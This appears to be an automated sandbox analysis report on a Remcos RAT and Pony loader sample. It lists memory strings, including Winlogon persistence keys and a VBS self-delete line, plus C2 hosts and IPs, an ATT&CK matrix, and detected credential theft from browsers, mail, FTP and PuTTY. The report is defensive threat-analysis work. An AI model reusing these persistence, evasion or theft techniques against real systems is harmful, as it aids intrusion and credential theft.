                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: \uninstall.vbsEXEpathUserinitC:\WINDOWS\system32\userinit.exeShellexplorer.exeSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsUserProfileAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS
                    Source: file.exe, 0000000B.00000002.2305053551.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_InjDOM^
                    Yara detected Pony
                    Source: Yara matchFile source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: cmd.exe11_2_00402AAD

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		1
                    Valid Accounts                    		2
                    Native API                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		3
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		22
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		1
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution                    		1
                    Valid Accounts                    		11
                    Access Token Manipulation                    		1
                    Install Root Certificate                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Windows Service                    		1
                    Windows Service                    		1
                    DLL Side-Loading                    		2
                    Credentials In Files                    		4
                    File and Directory Discovery                    		Distributed Component Object Model1
                    Email Collection                    		1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd12
                    Registry Run Keys / Startup Folder                    		222
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets35
                    System Information Discovery                    		SSH211
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                    Registry Run Keys / Startup Folder                    		1
                    Valid Accounts                    		Cached Domain Credentials21
                    Security Software Discovery                    		VNC3
                    Clipboard Data                    		122
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync21
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Access Token Manipulation                    		Proc Filesystem2
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574872 Sample: file.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 53 www.mva.by 2->53 55 admino.ml 2->55 57 mva.by 2->57 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 24 other signatures 2->85 10 file.exe 17 2->10         started        15 file.exe 14 2->15         started        signatures3 process4 dnsIp5 61 mva.by 93.125.99.121, 49704, 80 BELPAK-ASBELPAKBY Belarus 10->61 45 C:\Users\user\AppData\Roaming\...\file.exe, PE32 10->45 dropped 47 C:\Users\user\AppData\Local\Temp\SGS.exe, PE32 10->47 dropped 49 C:\Users\user\AppData\Local\...\scan[1].exe, PE32 10->49 dropped 51 C:\Users\user\...\file.exe:Zone.Identifier, ASCII 10->51 dropped 87 Drops PE files to the startup folder 10->87 89 Injects a PE file into a foreign processes 10->89 17 SGS.exe 10->17         started        20 file.exe 1 4 10->20         started        24 SGS.exe 15->24         started        26 file.exe 15->26         started        file6 signatures7 process8 dnsIp9 63 Antivirus detection for dropped file 17->63 65 Multi AV Scanner detection for dropped file 17->65 67 Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code 17->67 77 2 other signatures 17->77 28 SGS.exe 1 14 17->28         started        59 154.16.63.197, 3360, 49705, 49751 ASDETUKhttpwwwheficedcomGB South Africa 20->59 43 C:\Users\user\AppData\Roaming\...\logs.dat, ASCII 20->43 dropped 69 Opens the same file many times (likely Sandbox evasion) 20->69 31 conhost.exe 20->31         started        71 Injects a PE file into a foreign processes 24->71 33 SGS.exe 14 24->33         started        73 Detected Remcos RAT 26->73 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->75 file10 signatures11 process12 signatures13 35 cmd.exe 1 28->35         started        91 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 33->91 93 Tries to steal Mail credentials (via file / registry access) 33->93 95 Tries to harvest and steal ftp login credentials 33->95 97 Tries to harvest and steal browser information (history, passwords, etc) 33->97 37 cmd.exe 33->37         started        process14 process15 39 conhost.exe 35->39         started        41 conhost.exe 37->41         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.